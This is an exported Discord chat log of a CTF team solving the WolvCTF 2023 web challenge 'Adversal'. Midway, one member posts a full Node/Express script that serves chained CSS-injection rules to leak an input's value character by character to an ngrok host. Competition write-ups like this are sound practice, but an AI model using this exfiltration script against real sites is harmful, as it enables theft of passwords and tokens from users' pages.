Guild icon
Project Sekai
🔒 WolvCTF 2023 / ✅-web-adversal
Avatar
Sutx BOT 03/17/2023 1:00 PM
Adversal - 500 points
Category: Web Description: I added advertisements to my web application to serve one time passwords! I'm sure ads are secure, right? https://adversal-tlejfksioa-ul.a.run.app Files:Tags: Nolan1324#4645
03/17/2023 1:00 PM
Sutx pinned a message to this channel. 03/17/2023 1:00 PM
Avatar
Sutx BOT 03/17/2023 1:12 PM
@irogir wants to collaborate 🤝
Avatar
Sutx BOT 03/17/2023 7:43 PM
@Violin wants to collaborate 🤝
Avatar
Sutx BOT 03/17/2023 8:42 PM
@strellic wants to collaborate 🤝
Avatar
strellic 03/17/2023 8:43 PM
i dont want to look at the php one ngl
20:43
so
Avatar
sahuang 03/17/2023 8:43 PM
yeah php is 💀
Avatar
strellic 03/17/2023 8:43 PM
script-src 'none'; object-src 'none'; connect-src 'self';
20:44
css inj to leak
20:44
cringe
20:44
i dont want to impl
20:44
aaaaaaaa
20:50
trying to find a previous css inj script
🥹 1
20:50
pain
20:51
fk ill just write it
20:51
cringe (edited)
Avatar
strellic 03/17/2023 9:11 PM
ok
Avatar
Avatar
strellic
used /ctf solve
Sutx BOT 03/17/2023 9:11 PM
✅ Challenge solved.
Avatar
strellic 03/17/2023 9:11 PM
const express = require("express"); const app = express(); const reqMap = new Map(); const HOST = "https://4067-23-93-70-105.ngrok.io"; const ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPRSTUVWXYZ0123456789"; let known = ""; const getCSS = (n) => ALPHABET.split("").map(c => `input[value^='${known + c}']${":nth-child(3)".repeat(n)} { background: url(${HOST}/leak/${n + 1}/${c}); }`).join("\n"); app.use((req, res, next) => { console.log(known, req.originalUrl); next(); }); app.get("/css/:n", (req, res) => { res.setHeader("Content-Type", "text/css"); if (req.params.n === "0") { res.send(getCSS(0)); return; } reqMap.set(parseInt(req.params.n), res); }); app.get("/leak/:n/:c", (req, res) => { let { n, c } = req.params; known += c; n = parseInt(n); if (reqMap.has(n)) { reqMap.get(n).send(getCSS(n)); } res.send("lmfao"); }); app.listen(42069);
Avatar
Violin 03/17/2023 9:11 PM
goddd
Avatar
sahuang 03/17/2023 9:12 PM
could i note it out so others can see too
Avatar
strellic 03/17/2023 9:12 PM
sure
Avatar
sahuang 03/17/2023 9:52 PM
wait lmao
21:52
Description: The admin will not be fooled by redirects anymore! So the ads are definitely secure now, right?
Avatar
strellic 03/17/2023 9:54 PM
bruh
21:54
should be fine
Avatar
sahuang 03/17/2023 9:54 PM
oh
21:54
i think the other team cheesed it somehow? idk
Avatar
strellic 03/17/2023 9:54 PM
xd
21:54
challenge not up
21:54
huh
21:55
yknow i didnt even look at the code that hard
21:55
i can definitely see what happened tho
Avatar
sahuang 03/17/2023 9:57 PM
incoming insta blood? lmao
Avatar
strellic 03/17/2023 9:58 PM
did they just remove the chall
21:58
i had the flag
21:59
solved
21:59
zzz
21:59
ez 1000 points
Avatar
sahuang 03/17/2023 10:01 PM
🛐 promax
Exported 41 message(s)